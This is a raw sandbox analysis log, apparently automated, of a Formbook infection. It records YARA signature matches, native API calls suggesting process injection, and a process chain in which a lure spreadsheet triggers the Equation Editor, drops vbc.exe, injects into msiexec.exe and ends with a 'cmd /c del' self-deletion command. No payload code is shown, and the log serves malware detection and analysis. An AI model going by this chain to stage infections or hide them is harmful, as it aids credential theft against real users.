Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe | Code function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_022166E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_022166F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02216340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02216743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Code function: 0_2_02216753
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406043
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404618
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040681A
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1000CA10
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001707B
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001FC94
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001756F
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10017987
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10017DBC
Source: C:\Users\Public\vbc.exe | Code function: 4_2_100181F1
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10020206
Source: C:\Users\Public\vbc.exe | Code function: 4_2_100222C3
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10015AF9
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10020F20
Source: C:\Users\Public\vbc.exe | Code function: 4_2_1001D36E
Source: C:\Users\Public\vbc.exe | Code function: 4_2_10020778
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00401030
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8C3
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C090
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0040120B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C394
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408C7B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C4D0
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408C80
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041CC86
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041BD0F
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402D8E
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402D90
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402FB0
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C905A
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B3040
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007DD005
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007AE0C6
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007AE2E9
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00851238
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007FA37B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B7353
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B2305
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007D63DB
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007AF3CF
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007ED47D
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C1489
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E5485
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007F6540
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B351F
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007CC5F0
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00852622
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007BE6C1
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B4680
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0083579A
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E57C3
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007BC7BC
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007D286D
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007BC85C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0084F8EE
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0085098E
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C69FE
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B29B2
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00835955
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00863A83
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0085CBA4
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0083DBDA
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007D7B00
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007AFBD7
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007BCD5B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E0D3B
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0084FDDD
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007CEE4C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007E2E2F
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007DDF7C
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007C0F3F
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00401030
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041B8C3
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C090
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0040120B
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C394
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00408C7B
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041C4D0
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00408C80
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041CC86
Source: C:\Users\Public\vbc.exe | Code function: 5_1_0041BD0F
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00402D8E
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00402D90
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00402FB0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025A1238
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024FE2E9
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02507353
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0254A37B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02502305
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024FF3CF
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025263DB
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0251905A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02503040
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0252D005
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024FE0C6
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025A2622
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250E6C1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02504680
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025357C3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0258579A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250C7BC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0253D47D
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02535485
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02511489
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02546540
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250351F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0251C5F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025B3A83
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02527B00
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0258DBDA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024FFBD7
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025ACBA4
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250C85C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0252286D
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0259F8EE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02585955
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025169FE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025A098E
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025029B2
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0251EE4C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02532E2F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0252DF7C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02510F3F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0250CD5B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02530D3B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0259FDDD
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_000AC090
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_000AC4D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_000AB8C3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00098C7B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00098C80
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_000ACC86
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_000ABD0F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00092D8E
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00092D90
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00092FB0
Source: C:\Users\Public\vbc.exe | Code function: String function: 007ADF5C appears 118 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007F373B appears 238 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0081F970 appears 81 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007F3F92 appears 108 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0041A4C0 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007AE2A8 appears 38 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 024FDF5C appears 117 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 024FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0256F970 appears 81 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0254373B appears 238 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 02543F92 appears 108 times
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185E0 NtCreateFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418690 NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418710 NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187BC NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A0060 NtQuerySection,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A10D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A1148 NtOpenThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A01D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079F8CC NtWaitForSingleObject,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079F938 NtWriteFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A1930 NtSetContextThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FA50 NtEnumerateValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FA20 NtQueryInformationFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FAB8 NtQueryValueKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FB50 NtCreateKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FBE8 NtQueryVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FC48 NtSetInformationFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A0C40 NtGetContextThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FC30 NtOpenProcess,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FD5C NtEnumerateKey,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007A1D80 NtSuspendThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FE24 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FF34 NtQueueApcThread,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_0079FFFC NtCreateProcessEx,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004185E0 NtCreateFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00418690 NtReadFile,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_00418710 NtClose,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 5_1_004187BC NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024F00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024F07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EFB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_024EFFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0060 NtQuerySection,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0078 NtResumeThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F10D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F1148 NtOpenThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F01D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFAD0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFAB8 NtQueryValueKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EF8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EF938 NtWriteFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F1930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F1D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A85E0 NtCreateFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A8690 NtReadFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A8710 NtClose,
      Source: winlogon[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: Quotation Request - Alligator Pty Ltd.xlsxReversingLabs: Detection: 31%
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
